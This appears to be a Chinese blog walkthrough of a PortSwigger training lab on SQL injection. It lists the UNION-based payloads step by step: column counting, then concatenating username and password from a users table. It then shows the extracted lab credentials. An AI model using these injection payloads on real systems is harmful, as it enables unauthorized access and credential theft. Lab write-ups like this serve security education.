burpsuite靶场----SQL注入9----在一列中获得多列数据

靶场地址

https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column

正式开始

1.选中标签


2.利用' order by 2-- 没报错 ' order by 3--报错 确定列数为3
3.根据提示The database contains a different table called users, with columns called username and password.
' union select NULL,NULL--

' union select username,password from users-- 发现报错

所以要确定敏感信息所在列
' union select NULL,username from users--

所以确定敏感信息在第二列
那么怎么才能才能同时注出username和password
如果这是mysql数据库的话,可以使用concat(username,'~',password)连接

这里使用||进行连接
' union select NULL,username||'~'||password from users--

administrator~y3qs91cqzhzhydq25j8x
carlos~8do2wtxdpnrx83w5nots
wiener~emsaqv99bqb6tytqj4sp
最终成功登录

本栏目推荐文章
• Jmeter 如何连接mysql数据库？
• SQL Server 检测是不是数字型数据的两种方法
• 如何通过Navicat把MySQL远程数据库导入到本地数据库
• 和利时MACS6通过dat文件实现任意时间范围与测点的历史数据提取与科研分析
• 深入理解spring框架：剖析多线程模式下数据库连接
• SQL Join的一些总结
• SQL Server 高性能写入的一些总结
• 网络攻击技术开篇——SQL Injection
• 数据可视化是如何帮助大型企业提高效率的？
• redis 数据库

靶场 burpsuite 数据 SQL靶场burpsuite数据sql 靶场burpsuite信息sql 靶场burpsuite order sql 靶场burpsuite where sql 靶场 密钥burpsuite sql 靶场burpsuite数据库 内容 靶场 数据burpsuite数据库 靶场burpsuite目录 靶场burpsuite信息 靶场burpsuite时间oracle